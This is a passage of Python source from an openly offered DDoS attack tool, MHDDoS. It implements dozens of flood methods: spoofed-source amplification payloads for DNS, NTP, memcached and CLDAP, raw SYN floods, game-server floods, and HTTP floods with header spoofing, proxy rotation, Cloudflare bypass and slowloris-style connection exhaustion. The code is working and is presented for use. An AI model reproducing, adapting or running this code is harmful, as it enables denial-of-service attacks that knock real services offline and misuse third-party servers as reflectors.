self._amp_payload = (
b'\x00\x00\x00\x00\x00\x00\x00\xff\x00\x00\x00\x00\x00\x00\x00\x00',
3389)
self.SENT_FLOOD = self.AMP
self._amp_payloads = cycle(self._generate_amp())
if name == "CLDAP":
self._amp_payload = (b'\x30\x25\x02\x01\x01\x63\x20\x04\x00\x0a\x01\x00\x0a\x01\x00\x02\x01\x00\x02\x01\x00'
b'\x01\x01\x00\x87\x0b\x6f\x62\x6a\x65\x63\x74\x63\x6c\x61\x73\x73\x30\x00', 389)
self.SENT_FLOOD = self.AMP
self._amp_payloads = cycle(self._generate_amp())
if name == "MEM":
self._amp_payload = (
b'\x00\x01\x00\x00\x00\x01\x00\x00gets p h e\n', 11211)
self.SENT_FLOOD = self.AMP
self._amp_payloads = cycle(self._generate_amp())
if name == "CHAR":
self._amp_payload = (b'\x01', 19)
self.SENT_FLOOD = self.AMP
self._amp_payloads = cycle(self._generate_amp())
if name == "ARD":
self._amp_payload = (b'\x00\x14\x00\x00', 3283)
self.SENT_FLOOD = self.AMP
self._amp_payloads = cycle(self._generate_amp())
if name == "NTP":
self._amp_payload = (b'\x17\x00\x03\x2a\x00\x00\x00\x00', 123)
self.SENT_FLOOD = self.AMP
self._amp_payloads = cycle(self._generate_amp())
if name == "DNS":
self._amp_payload = (
b'\x45\x67\x01\x00\x00\x01\x00\x00\x00\x00\x00\x01\x02\x73\x6c\x00\x00\xff\x00\x01\x00'
b'\x00\x29\xff\xff\x00\x00\x00\x00\x00\x00', 53)
self.SENT_FLOOD = self.AMP
self._amp_payloads = cycle(self._generate_amp())
def TCP(self) -> None:
s = None
with suppress(Exception), self.open_connection(AF_INET, SOCK_STREAM) as s:
while Tools.send(s, randbytes(1024)):
continue
Tools.safe_close(s)
def MINECRAFT(self) -> None:
handshake = Minecraft.handshake(self._target, 74, 1)
ping = Minecraft.data(b'\x00')
s = None
with suppress(Exception), self.open_connection(AF_INET, SOCK_STREAM) as s:
while Tools.send(s, handshake):
Tools.send(s, ping)
Tools.safe_close(s)
def CPS(self) -> None:
global REQUESTS_SENT
s = None
with suppress(Exception), self.open_connection(AF_INET, SOCK_STREAM) as s:
REQUESTS_SENT += 1
Tools.safe_close(s)
def alive_connection(self) -> None:
s = None
with suppress(Exception), self.open_connection(AF_INET, SOCK_STREAM) as s:
while s.recv(1):
continue
Tools.safe_close(s)
def CONNECTION(self) -> None:
global REQUESTS_SENT
with suppress(Exception):
Thread(target=self.alive_connection).start()
REQUESTS_SENT += 1
def UDP(self) -> None:
s = None
with suppress(Exception), socket(AF_INET, SOCK_DGRAM) as s:
while Tools.sendto(s, randbytes(1024), self._target):
continue
Tools.safe_close(s)
def SYN(self) -> None:
payload = self._genrate_syn()
s = None
with suppress(Exception), socket(AF_INET, SOCK_RAW, IPPROTO_TCP) as s:
s.setsockopt(IPPROTO_IP, IP_HDRINCL, 1)
while Tools.sendto(s, payload, self._target):
continue
Tools.safe_close(s)
def AMP(self) -> None:
payload = next(self._amp_payloads)
s = None
with suppress(Exception), socket(AF_INET, SOCK_RAW,
IPPROTO_UDP) as s:
s.setsockopt(IPPROTO_IP, IP_HDRINCL, 1)
while Tools.sendto(s, *payload):
continue
Tools.safe_close(s)
def MCBOT(self) -> None:
s = None
with suppress(Exception), self.open_connection(AF_INET, SOCK_STREAM) as s:
Tools.send(s, Minecraft.handshake_forwarded(self._target,
47,
2,
ProxyTools.Random.rand_ipv4(),
uuid4()))
Tools.send(s, Minecraft.login(f"MHDDoS_{ProxyTools.Random.rand_str(5)}"))
sleep(1.5)
c = 360
while Tools.send(s, Minecraft.keepalive(randint(1111111, 9999999))):
c -= 1
if c:
continue
c = 360
Tools.send(s, Minecraft.chat(Tools.randchr(100)))
Tools.safe_close(s)
def VSE(self) -> None:
global BYTES_SEND, REQUESTS_SENT
payload = (b'\xff\xff\xff\xff\x54\x53\x6f\x75\x72\x63\x65\x20\x45\x6e\x67\x69\x6e\x65'
b'\x20\x51\x75\x65\x72\x79\x00')
with socket(AF_INET, SOCK_DGRAM) as s:
while Tools.sendto(s, payload, self._target):
continue
Tools.safe_close(s)
def FIVEM(self) -> None:
global BYTES_SEND, REQUESTS_SENT
payload = b'\xff\xff\xff\xffgetinfo xxx\x00\x00\x00'
with socket(AF_INET, SOCK_DGRAM) as s:
while Tools.sendto(s, payload, self._target):
continue
Tools.safe_close(s)
def TS3(self) -> None:
global BYTES_SEND, REQUESTS_SENT
payload = b'\x05\xca\x7f\x16\x9c\x11\xf9\x89\x00\x00\x00\x00\x02'
with socket(AF_INET, SOCK_DGRAM) as s:
while Tools.sendto(s, payload, self._target):
continue
Tools.safe_close(s)
def MCPE(self) -> None:
global BYTES_SEND, REQUESTS_SENT
payload = (b'\x61\x74\x6f\x6d\x20\x64\x61\x74\x61\x20\x6f\x6e\x74\x6f\x70\x20\x6d\x79\x20\x6f'
b'\x77\x6e\x20\x61\x73\x73\x20\x61\x6d\x70\x2f\x74\x72\x69\x70\x68\x65\x6e\x74\x20'
b'\x69\x73\x20\x6d\x79\x20\x64\x69\x63\x6b\x20\x61\x6e\x64\x20\x62\x61\x6c\x6c'
b'\x73')
with socket(AF_INET, SOCK_DGRAM) as s:
while Tools.sendto(s, payload, self._target):
continue
Tools.safe_close(s)
def _genrate_syn(self) -> bytes:
ip: IP = IP()
ip.set_ip_src(getMyIPAddress())
ip.set_ip_dst(self._target[0])
tcp: TCP = TCP()
tcp.set_SYN()
tcp.set_th_dport(self._target[1])
tcp.set_th_sport(randint(1, 65535))
ip.contains(tcp)
return ip.get_packet()
def _generate_amp(self):
payloads = []
for ref in self._ref:
ip: IP = IP()
ip.set_ip_src(self._target[0])
ip.set_ip_dst(ref)
ud: UDP = UDP()
ud.set_uh_dport(self._amp_payload[1])
ud.set_uh_sport(self._target[1])
ud.contains(Data(self._amp_payload[0]))
ip.contains(ud)
payloads.append((ip.get_packet(), (ref, self._amp_payload[1])))
return payloads
# noinspection PyBroadException,PyUnusedLocal
class HttpFlood(Thread):
_proxies: List[Proxy] = None
_payload: str
_defaultpayload: Any
_req_type: str
_useragents: List[str]
_referers: List[str]
_target: URL
_method: str
_rpc: int
_synevent: Any
SENT_FLOOD: Any
def __init__(self,
target: URL,
host: str,
method: str = "GET",
rpc: int = 1,
synevent: Event = None,
useragents: Set[str] = None,
referers: Set[str] = None,
proxies: Set[Proxy] = None) -> None:
Thread.__init__(self, daemon=True)
self.SENT_FLOOD = None
self._synevent = synevent
self._rpc = rpc
self._method = method
self._target = target
self._host = host
self._raw_target = (self._host, (self._target.port or 80))
if not self._target.host[len(self._target.host) - 1].isdigit():
self._raw_target = (self._host, (self._target.port or 80))
if not referers:
referers: List[str] = [
"https://www.facebook.com/l.php?u=https://www.facebook.com/l.php?u=",
",https://www.facebook.com/sharer/sharer.php?u=https://www.facebook.com/sharer"
"/sharer.php?u=",
",https://drive.google.com/viewerng/viewer?url=",
",https://www.google.com/translate?u="
]
self._referers = list(referers)
if proxies:
self._proxies = list(proxies)
if not useragents:
useragents: List[str] = [
'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 '
'Safari/537.36',
'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 '
'Safari/537.36',
'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 '
'Safari/537.36',
'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0'
]
self._useragents = list(useragents)
self._req_type = self.getMethodType(method)
self._defaultpayload = "%s %s HTTP/%s\r\n" % (self._req_type,
target.raw_path_qs, randchoice(['1.0', '1.1', '1.2']))
self._payload = (self._defaultpayload +
'Accept-Encoding: gzip, deflate, br\r\n'
'Accept-Language: en-US,en;q=0.9\r\n'
'Cache-Control: max-age=0\r\n'
'Connection: Keep-Alive\r\n'
'Sec-Fetch-Dest: document\r\n'
'Sec-Fetch-Mode: navigate\r\n'
'Sec-Fetch-Site: none\r\n'
'Sec-Fetch-User: ?1\r\n'
'Sec-Gpc: 1\r\n'
'Pragma: no-cache\r\n'
'Upgrade-Insecure-Requests: 1\r\n')
def run(self) -> None:
if self._synevent: self._synevent.wait()
self.select(self._method)
while self._synevent.is_set():
self.SENT_FLOOD()
@property
def SpoofIP(self) -> str:
spoof: str = ProxyTools.Random.rand_ipv4()
return ("X-Forwarded-Proto: Http\r\n"
f"X-Forwarded-Host: {self._target.raw_host}, 1.1.1.1\r\n"
f"Via: {spoof}\r\n"
f"Client-IP: {spoof}\r\n"
f'X-Forwarded-For: {spoof}\r\n'
f'Real-IP: {spoof}\r\n')
def generate_payload(self, other: str = None) -> bytes:
return str.encode((self._payload +
"Host: %s\r\n" % self._target.authority +
self.randHeadercontent +
(other if other else "") +
"\r\n"))
def open_connection(self) -> socket:
if self._proxies:
sock = randchoice(self._proxies).open_socket(AF_INET, SOCK_STREAM)
else:
sock = socket(AF_INET, SOCK_STREAM)
sock.setsockopt(IPPROTO_TCP, TCP_NODELAY, 1)
sock.connect(self._raw_target)
if self._target.scheme.lower() == "https":
sock = ctx.wrap_socket(sock,
server_hostname=self._target.host,
server_side=False,
do_handshake_on_connect=True,
suppress_ragged_eofs=True)
return sock
@property
def randHeadercontent(self) -> str:
return (f"User-Agent: {randchoice(self._useragents)}\r\n"
f"Referrer: {randchoice(self._referers)}{parse.quote(self._target.human_repr())}\r\n" +
self.SpoofIP)
@staticmethod
def getMethodType(method: str) -> str:
return "GET" if {method.upper()} & {"CFB", "CFBUAM", "GET", "COOKIE", "OVH", "EVEN",
"DYN", "SLOW", "PPS", "APACHE",
"BOT", } \
else "POST" if {method.upper()} & {"POST", "XMLRPC", "STRESS"} \
else "HEAD" if {method.upper()} & {"GSB", "HEAD"} \
else "REQUESTS"
def POST(self) -> None:
payload: bytes = self.generate_payload(
("Content-Length: 44\r\n"
"X-Requested-With: XMLHttpRequest\r\n"
"Content-Type: application/json\r\n\r\n"
'{"data": %s}') % ProxyTools.Random.rand_str(32))[:-2]
s = None
with suppress(Exception), self.open_connection() as s:
for _ in range(self._rpc):
Tools.send(s, payload)
Tools.safe_close(s)
def STRESS(self) -> None:
payload: bytes = self.generate_payload(
(f"Content-Length: 524\r\n"
"X-Requested-With: XMLHttpRequest\r\n"
"Content-Type: application/json\r\n\r\n"
'{"data": %s}') % ProxyTools.Random.rand_str(512))[:-2]
s = None
with suppress(Exception), self.open_connection() as s:
for _ in range(self._rpc):
Tools.send(s, payload)
Tools.safe_close(s)
def COOKIES(self) -> None:
payload: bytes = self.generate_payload(
"Cookie: _ga=GA%s;"
" _gat=1;"
" __cfduid=dc232334gwdsd23434542342342342475611928;"
" %s=%s\r\n" %
(randint(1000, 99999), ProxyTools.Random.rand_str(6),
ProxyTools.Random.rand_str(32)))
s = None
with suppress(Exception), self.open_connection() as s:
for _ in range(self._rpc):
Tools.send(s, payload)
Tools.safe_close(s)
def APACHE(self) -> None:
payload: bytes = self.generate_payload(
"Range: bytes=0-,%s" % ",".join("5-%d" % i
for i in range(1, 1024)))
s = None
with suppress(Exception), self.open_connection() as s:
for _ in range(self._rpc):
Tools.send(s, payload)
Tools.safe_close(s)
def XMLRPC(self) -> None:
payload: bytes = self.generate_payload(
("Content-Length: 345\r\n"
"X-Requested-With: XMLHttpRequest\r\n"
"Content-Type: application/xml\r\n\r\n"
"<?xml version='1.0' encoding='iso-8859-1'?>"
"<methodCall><methodName>pingback.ping</methodName>"
"<params><param><value><string>%s</string></value>"
"</param><param><value><string>%s</string>"
"</value></param></params></methodCall>") %
(ProxyTools.Random.rand_str(64),
ProxyTools.Random.rand_str(64)))[:-2]
s = None
with suppress(Exception), self.open_connection() as s:
for _ in range(self._rpc):
Tools.send(s, payload)
Tools.safe_close(s)
def PPS(self) -> None:
s = None
with suppress(Exception), self.open_connection() as s:
for _ in range(self._rpc):
Tools.send(s, self._defaultpayload)
Tools.safe_close(s)
def GET(self) -> None:
payload: bytes = self.generate_payload()
s = None
with suppress(Exception), self.open_connection() as s:
for _ in range(self._rpc):
Tools.send(s, payload)
Tools.safe_close(s)
def BOT(self) -> None:
payload: bytes = self.generate_payload()
p1, p2 = str.encode(
"GET /robots.txt HTTP/1.1\r\n"
"Host: %s\r\n" % self._target.raw_authority +
"Connection: Keep-Alive\r\n"
"Accept: text/plain,text/html,*/*\r\n"
"User-Agent: %s\r\n" % randchoice(google_agents) +
"Accept-Encoding: gzip,deflate,br\r\n\r\n"), str.encode(
"GET /sitemap.xml HTTP/1.1\r\n"
"Host: %s\r\n" % self._target.raw_authority +
"Connection: Keep-Alive\r\n"
"Accept: */*\r\n"
"From: googlebot(at)googlebot.com\r\n"
"User-Agent: %s\r\n" % randchoice(google_agents) +
"Accept-Encoding: gzip,deflate,br\r\n"
"If-None-Match: %s-%s\r\n" % (ProxyTools.Random.rand_str(9),
ProxyTools.Random.rand_str(4)) +
"If-Modified-Since: Sun, 26 Set 2099 06:00:00 GMT\r\n\r\n")
s = None
with suppress(Exception), self.open_connection() as s:
Tools.send(s, p1)
Tools.send(s, p2)
for _ in range(self._rpc):
Tools.send(s, payload)
Tools.safe_close(s)
def EVEN(self) -> None:
payload: bytes = self.generate_payload()
s = None
with suppress(Exception), self.open_connection() as s:
while Tools.send(s, payload) and s.recv(1):
continue
Tools.safe_close(s)
def OVH(self) -> None:
payload: bytes = self.generate_payload()
s = None
with suppress(Exception), self.open_connection() as s:
for _ in range(min(self._rpc, 5)):
Tools.send(s, payload)
Tools.safe_close(s)
def CFB(self):
global REQUESTS_SENT, BYTES_SEND
pro = None
if self._proxies:
pro = randchoice(self._proxies)
s = None
with suppress(Exception), create_scraper() as s:
for _ in range(self._rpc):
if pro:
with s.get(self._target.human_repr(),
proxies=pro.asRequest()) as res:
REQUESTS_SENT += 1
BYTES_SEND += Tools.sizeOfRequest(res)
continue
with s.get(self._target.human_repr()) as res:
REQUESTS_SENT += 1
BYTES_SEND += Tools.sizeOfRequest(res)
Tools.safe_close(s)
def CFBUAM(self):
payload: bytes = self.generate_payload()
s = None
with suppress(Exception), self.open_connection() as s:
Tools.send(s, payload)
sleep(5.01)
for _ in range(self._rpc):
Tools.send(s, payload)
Tools.safe_close(s)
def AVB(self):
payload: bytes = self.generate_payload()
s = None
with suppress(Exception), self.open_connection() as s:
for _ in range(self._rpc):
sleep(max(self._rpc / 1000, 1))
Tools.send(s, payload)
Tools.safe_close(s)
def DGB(self):
global REQUESTS_SENT, BYTES_SEND
s = None
with suppress(Exception), create_scraper() as s:
for _ in range(min(self._rpc, 5)):
sleep(min(self._rpc, 5) / 100)
if self._proxies:
pro = randchoice(self._proxies)
with s.get(self._target.human_repr(),
proxies=pro.asRequest()) as res:
REQUESTS_SENT += 1
BYTES_SEND += Tools.sizeOfRequest(res)
continue
with s.get(self._target.human_repr()) as res:
REQUESTS_SENT += 1
BYTES_SEND += Tools.sizeOfRequest(res)
Tools.safe_close(s)
def DYN(self):
payload: str | bytes = str.encode(self._payload +
"Host: %s.%s\r\n" % (ProxyTools.Random.rand_str(6), self._target.authority) +
self.randHeadercontent +
"\r\n")
s = None
with suppress(Exception), self.open_connection() as s:
for _ in range(self._rpc):
Tools.send(s, payload)
Tools.safe_close(s)
def DOWNLOADER(self):
payload: str | bytes = self.generate_payload()
s = None
with suppress(Exception), self.open_connection() as s:
for _ in range(self._rpc):
Tools.send(s, payload)
while 1:
sleep(.01)
data = s.recv(1)
if not data:
break
Tools.send(s, b'0')
Tools.safe_close(s)
def BYPASS(self):
global REQUESTS_SENT, BYTES_SEND
pro = None
if self._proxies:
pro = randchoice(self._proxies)
s = None
with suppress(Exception), Session() as s:
for _ in range(self._rpc):
if pro:
with s.get(self._target.human_repr(),
proxies=pro.asRequest()) as res:
REQUESTS_SENT += 1
BYTES_SEND += Tools.sizeOfRequest(res)
continue
with s.get(self._target.human_repr()) as res:
REQUESTS_SENT += 1
BYTES_SEND += Tools.sizeOfRequest(res)
Tools.safe_close(s)
def GSB(self):
payload = str.encode("%s %s?qs=%s HTTP/1.1\r\n" % (self._req_type,
self._target.raw_path_qs,
ProxyTools.Random.rand_str(6)) +
"Host: %s\r\n" % self._target.authority +
self.randHeadercontent +
'Accept-Encoding: gzip, deflate, br\r\n'
'Accept-Language: en-US,en;q=0.9\r\n'
'Cache-Control: max-age=0\r\n'
'Connection: Keep-Alive\r\n'
'Sec-Fetch-Dest: document\r\n'
'Sec-Fetch-Mode: navigate\r\n'
'Sec-Fetch-Site: none\r\n'
'Sec-Fetch-User: ?1\r\n'
'Sec-Gpc: 1\r\n'
'Pragma: no-cache\r\n'
'Upgrade-Insecure-Requests: 1\r\n\r\n')
s = None
with suppress(Exception), self.open_connection() as s:
for _ in range(self._rpc):
Tools.send(s, payload)
Tools.safe_close(s)
def NULL(self) -> None:
payload: str | bytes = str.encode(self._payload +
"Host: %s\r\n" % self._target.authority +
"User-Agent: null\r\n" +
"Referrer: null\r\n" +
self.SpoofIP + "\r\n")
s = None
with suppress(Exception), self.open_connection() as s:
for _ in range(self._rpc):
Tools.send(s, payload)
Tools.safe_close(s)
def BOMB(self):
pro = randchoice(self._proxies)
run([
f'{Path.home() / "go/bin/bombardier"}',
f'{bombardier_path}',
f'--connections={self._rpc}',
'--http2',
'--method=GET',
'--no-print',
'--timeout=5s',
f'--requests={self._rpc}',
f'--proxy={pro}',
f'{self._target.human_repr()}',
])
def SLOW(self):
payload: bytes = self.generate_payload()
s = None
with suppress(Exception), self.open_connection() as s:
for _ in range(self._rpc):
Tools.send(s, payload)
while Tools.send(s, payload) and s.recv(1):
for i in range(self._rpc):
keep = str.encode("X-a: %d\r\n" % randint(1, 5000))
Tools.send(s, keep)
sleep(self._rpc / 15)
break
Tools.safe_close(s)
def select(self, name: str) -> None:
self.SENT_FLOOD = self.GET
if name == "POST":
self.SENT_FLOOD = self.POST
if name == "CFB":
self.SENT_FLOOD = self.CFB
if name == "CFBUAM":
self.SENT_FLOOD = self.CFBUAM
if name == "XMLRPC":
self.SENT_FLOOD = self.XMLRPC
if name == "BOT":
self.SENT_FLOOD = self.BOT
if name == "APACHE":
self.SENT_FLOOD = self.APACHE
if name == "BYPASS":
self.SENT_FLOOD = self.BYPASS
if name == "OVH":
self.SENT_FLOOD = self.OVH
if name == "AVB":
self.SENT_FLOOD = self.AVB
if name == "STRESS":
self.SENT_FLOOD = self.STRESS
if name == "DYN":
self.SENT_FLOOD = self.DYN
if name == "SLOW":
self.SENT_FLOOD = self.SLOW
if name == "GSB":
self.SENT_FLOOD = self.GSB
if name == "NULL":
self.SENT_FLOOD = self.NULL
if name == "COOKIE":
self.SENT_FLOOD = self.COOKIES
if name == "PPS":
self.SENT_FLOOD = self.PPS
self._defaultpayload = (
self._defaultpayload +
"Host: %s\r\n\r\n" % self._target.authority).encode()
if name == "EVEN": self.SENT_FLOOD = self.EVEN
if name == "DOWNLOADER": self.SENT_FLOOD = self.DOWNLOADER
if name == "BOMB": self.SENT_FLOOD = self.BOMB
class ProxyManager:
@staticmethod
def DownloadFromConfig(cf, Proxy_type: int) -> Set[Proxy]:
providrs = [
provider for provider in cf["proxy-providers"]
if provider["type"] == Proxy_type or Proxy_type == 0
]
logger.info("Downloading Proxies form %d Providers" % len(providrs))
proxes: Set[Proxy] = set()
with ThreadPoolExecutor(len(providrs)) as executor:
future_to_download = {
executor.submit(
ProxyManager.download, provider,
ProxyType.stringToProxyType(str(provider["type"])))
for provider in providrs
}
for future in as_completed(future_to_download):
for pro in future.result():
proxes.add(pro)
return proxes
@staticmethod
def download(provider, proxy_type: ProxyType) -> Set[Proxy]:
logger.debug(
"Downloading Proxies form (URL: %s, Type: %s, Timeout: %d)" %
(provider["url"], proxy_type.name, provider["timeout"]))
proxes: Set[Proxy] = set()
with suppress(TimeoutError, exceptions.ConnectionError,
exceptions.ReadTimeout):
data = get(provider["url"], timeout=provider["timeout"]).text
try:
for proxy in ProxyUtiles.parseAllIPPort(
data.splitlines(), proxy_type):
proxes.add(proxy)
except Exception as e:
logger.error('Download Proxy Error: %s' %
(e.__str__() or e.__repr__()))
return proxes
class ToolsConsole:
METHODS = {"INFO", "TSSRV", "CFIP", "DNS", "PING", "CHECK", "DSTAT"}
@staticmethod
def checkRawSocket():
with suppress(OSError):
with socket(AF_INET, SOCK_RAW, IPPROTO_TCP):
return True
return False
@staticmethod
def runConsole():
cons = "%s@BetterStresser:~#" % gethostname()
while 1:
cmd = input(cons + " ").strip()
if not cmd: continue
if " " in cmd:
cmd, args = cmd.split(" ", 1)
cmd = cmd.upper()
if cmd == "HELP":
print("Tools:" + ", ".join(ToolsConsole.METHODS))
print("Commands: HELP, CLEAR, BACK, EXIT")
continue
if (cmd == "E") or \
(cmd == "EXIT") or \
(cmd == "Q") or \
(cmd == "QUIT") or \
(cmd == "LOGOUT") or \
(cmd == "CLOSE"):
exit(-1)
if cmd == "CLEAR":
print("\033c")
continue
if not {cmd} & ToolsConsole.METHODS:
print("%s command not found" % cmd)
continue
if cmd == "DSTAT":
with suppress(KeyboardInterrupt):
ld = net_io_counters(pernic=False)
while True:
sleep(1)
od = ld
ld = net_io_counters(pernic=False)
t = [(last - now) for now, last in zip(od, ld)]
logger.info(
("Bytes Sended %s\n"
"Bytes Recived %s\n"
"Packets Sended %s\n"
"Packets Recived %s\n"
"ErrIn %s\n"
"ErrOut %s\n"
"DropIn %s\n"
"DropOut %s\n"
"Cpu Usage %s\n"
"Memory %s\n") %
(Tools.humanbytes(t[0]), Tools.humanbytes(t[1]),
Tools.humanformat(t[2]), Tools.humanformat(t[3]),
t[4], t[5], t[6], t[7], str(cpu_percent()) + "%",
str(virtual_memory().percent) + "%"))
if cmd in ["CFIP", "DNS"]:
print("Soon")
continue
if cmd == "CHECK":
while True:
with suppress(Exception):
domain = input(f'{cons}give-me-ipaddress# ')
if not domain: continue
if domain.upper() == "BACK": break
if domain.upper() == "CLEAR":
print("\033c")
continue
if (domain.upper() == "E") or \
(domain.upper() == "EXIT") or \
(domain.upper() == "Q") or \
(domain.upper() == "QUIT") or \
(domain.upper() == "LOGOUT") or \
(domain.upper() == "CLOSE"):
exit(-1)
if "/" not in domain: continue
print('please wait ...', end="\r")
with get(domain, timeout=20) as r:
print(('status_code: %d\n'
'status: %s') %
(r.status_code, "ONLINE"
if r.status_code <= 500 else "OFFLINE"))
return
print("Error!")
if cmd == "INFO":
while True:
domain = input(f'{cons}give-me-ipaddress# ')
if not domain: continue
if domain.upper() == "BACK": break
if domain.upper() == "CLEAR":
print("\033c")
continue
if (domain.upper() == "E") or \
(domain.upper() == "EXIT") or \
(domain.upper() == "Q") or \
(domain.upper() == "QUIT") or \
(domain.upper() == "LOGOUT") or \
(domain.upper() == "CLOSE"):
exit(-1)
domain = domain.replace('https://',
'').replace('http://', '')
if "/" in domain: domain = domain.split("/")[0]
print('please wait ...', end="\r")
info = ToolsConsole.info(domain)
if not info["success"]:
print("Error!")
continue
logger.info(("Country: %s\n"
"City: %s\n"
"Org: %s\n"
"Isp: %s\n"
"Region: %s\n") %
(info["country"], info["city"], info["org"],
info["isp"], info["region"]))
if cmd == "TSSRV":
while True:
domain = input(f'{cons}give-me-domain# ')
if not domain: continue
if domain.upper() == "BACK": break
if domain.upper() == "CLEAR":
print("\033c")
continue
if (domain.upper() == "E") or \
(domain.upper() == "EXIT") or \
(domain.upper() == "Q") or \
(domain.upper() == "QUIT") or \
(domain.upper() == "LOGOUT") or \
(domain.upper() == "CLOSE"):
exit(-1)
domain = domain.replace('https://',
'').replace('http://', '')
if "/" in domain: domain = domain.split("/")[0]
print('please wait ...', end="\r")
info = ToolsConsole.ts_srv(domain)
logger.info("TCP: %s\n" % (info['_tsdns._tcp.']))
logger.info("UDP: %s\n" % (info['_ts3._udp.']))
if cmd == "PING":
while True:
domain = input(f'{cons}give-me-ipaddress# ')
if not domain: continue
if domain.upper() == "BACK": break
if domain.upper() == "CLEAR":
print("\033c")
if (domain.upper() == "E") or \
(domain.upper() == "EXIT") or \
(domain.upper() == "Q") or \
(domain.upper() == "QUIT") or \
(domain.upper() == "LOGOUT") or \
(domain.upper() == "CLOSE"):
exit(-1)
domain = domain.replace('https://',
'').replace('http://', '')
if "/" in domain: domain = domain.split("/")[0]
print('please wait ...', end="\r")
r = ping(domain, count=5, interval=0.2)
logger.info(('Address: %s\n'
'Ping: %d\n'
'Aceepted Packets: %d/%d\n'
'status: %s\n') %
(r.address, r.avg_rtt, r.packets_received,
r.packets_sent,
"ONLINE" if r.is_alive else "OFFLINE"))
@staticmethod
def stop():
print('All Attacks has been Stopped !')
for proc in process_iter():
if proc.name() == "python.exe":
proc.kill()
@staticmethod
def usage():
print((
'* MHDDoS - DDoS Attack Script With %d Methods\n'
'Note: If the Proxy list is empty, the attack will run without proxies\n'
' If the Proxy file doesn\'t exist, the script will download proxies and check them.\n'
' Proxy Type 0 = All in config.json\n'
' SocksTypes:\n'
' - 6 = RANDOM\n'
' - 5 = SOCKS5\n'
' - 4 = SOCKS4\n'
' - 1 = HTTP\n'
' - 0 = ALL\n'
' > Methods:\n'
' - Layer4\n'
' | %s | %d Methods\n'
' - Layer7\n'
' | %s | %d Methods\n'
' - Tools\n'
' | %s | %d Methods\n'
' - Others\n'
' | %s | %d Methods\n'
' - All %d Methods\n'
'\n'
'Example:\n'
' L7: python3 %s <method> <url> <socks_type> <threads> <proxylist> <rpc> <duration> <debug=optional>\n'
' L4: python3 %s <method> <ip:port> <threads> <duration>\n'
' L4 Proxied: python3 %s <method> <ip:port> <threads> <duration> <socks_type> <proxylist>\n'
' L4 Amplification: python3 %s <method> <ip:port> <threads> <duration> <reflector file (only use with'
' Amplification)>\n') %
(len(Methods.ALL_METHODS) + 3 + len(ToolsConsole.METHODS),
", ".join(Methods.LAYER4_METHODS), len(Methods.LAYER4_METHODS),
", ".join(Methods.LAYER7_METHODS), len(Methods.LAYER7_METHODS),
", ".join(ToolsConsole.METHODS), len(ToolsConsole.METHODS),
", ".join(["TOOLS", "HELP", "STOP"]), 3,
len(Methods.ALL_METHODS) + 3 + len(ToolsConsole.METHODS),
argv[0], argv[0], argv[0], argv[0]))
# noinspection PyBroadException
@staticmethod
def ts_srv(domain):
records = ['_ts3._udp.', '_tsdns._tcp.']
DnsResolver = resolver.Resolver()
DnsResolver.timeout = 1
DnsResolver.lifetime = 1
Info = {}
for rec in records:
try:
srv_records = resolver.resolve(rec + domain, 'SRV')
for srv in srv_records:
Info[rec] = str(srv.target).rstrip('.') + ':' + str(
srv.port)
except:
Info[rec] = 'Not found'
return Info
# noinspection PyUnreachableCode
@staticmethod
def info(domain):
with suppress(Exception), get("https://ipwhois.app/json/%s/" % domain) as s:
return s.json()
return {"success": False}
def handleProxyList(con, proxy_li, proxy_ty, url=None):
if proxy_ty not in {4, 5, 1, 0, 6}:
exit("Socks Type Not Found [4, 5, 1, 0, 6]")
if proxy_ty == 6:
proxy_ty = randchoice([4, 5, 1])
if not proxy_li.exists():
logger.warning("The file doesn't exist, creating files and downloading proxies.")
proxy_li.parent.mkdir(parents=True, exist_ok=True)
with proxy_li.open("w") as wr:
Proxies: Set[Proxy] = ProxyManager.DownloadFromConfig(con, proxy_ty)
logger.info(
f"{len(Proxies):,} Proxies are getting checked, this may take awhile!"
)
Proxies = ProxyChecker.checkAll(
Proxies, timeout=1, threads=threads,
url=url.human_repr() if url else "http://httpbin.org/get",
)
if not Proxies:
exit(
"Proxy Check failed, Your network may be the problem"
" | The target may not be available."
)
stringBuilder = ""
for proxy in Proxies:
stringBuilder += (proxy.__str__() + "\n")
wr.write(stringBuilder)
proxies = ProxyUtiles.readFromFile(proxy_li)
if proxies:
logger.info(f"Proxy Count: {len(proxies):,}")
else:
logger.info(
"Empty Proxy File, running flood witout proxy")
proxies = None
return proxies
if __name__ == '__main__':
with open(__dir__ / "config.json") as f:
con = load(f)
with suppress(KeyboardInterrupt):
with suppress(IndexError):
one = argv[1].upper()
if one == "HELP":
raise IndexError()
if one == "TOOLS":
ToolsConsole.runConsole()
if one == "STOP":
ToolsConsole.stop()
method = one
host = None
url = None
event = Event()
event.clear()
target = None
urlraw = argv[2].strip()
if not urlraw.startswith("http"):
urlraw = "http://" + urlraw
if method not in Methods.ALL_METHODS:
exit("Method Not Found %s" %
", ".join(Methods.ALL_METHODS))
if method in Methods.LAYER7_METHODS:
url = URL(urlraw)
host = url.host
try:
host = gethostbyname(url.host)
except Exception as e:
exit('Cannot resolve hostname ', url.host, e)
threads = int(argv[4])
rpc = int(argv[6])
timer = int(argv[7])
proxy_ty = int(argv[3].strip())
proxy_li = Path(__dir__ / "files/proxies/" /
argv[5].strip())
useragent_li = Path(__dir__ / "files/useragent.txt")
referers_li = Path(__dir__ / "files/referers.txt")
bombardier_path = Path(__dir__ / "go/bin/bombardier")
proxies: Any = set()
if method == "BOMB":
assert (
bombardier_path.exists()
or bombardier_path.with_suffix('.exe').exists()
), (
"Install bombardier: "
"https://github.com/MHProDev/MHDDoS/wiki/BOMB-method"
)
if len(argv) == 9:
logger.setLevel("DEBUG")
if not useragent_li.exists():
exit("The Useragent file doesn't exist ")
if not referers_li.exists():
exit("The Referer file doesn't exist ")
uagents = set(a.strip()
for a in useragent_li.open("r+").readlines())
referers = set(a.strip()
for a in referers_li.open("r+").readlines())
if not uagents: exit("Empty Useragent File ")
if not referers: exit("Empty Referer File ")
if threads > 1000:
logger.warning("Thread is higher than 1000")
if rpc > 100:
logger.warning(
"RPC (Request Pre Connection) is higher than 100")
proxies = handleProxyList(con, proxy_li, proxy_ty, url)
for _ in range(threads):
HttpFlood(url, host, method, rpc, event, uagents,
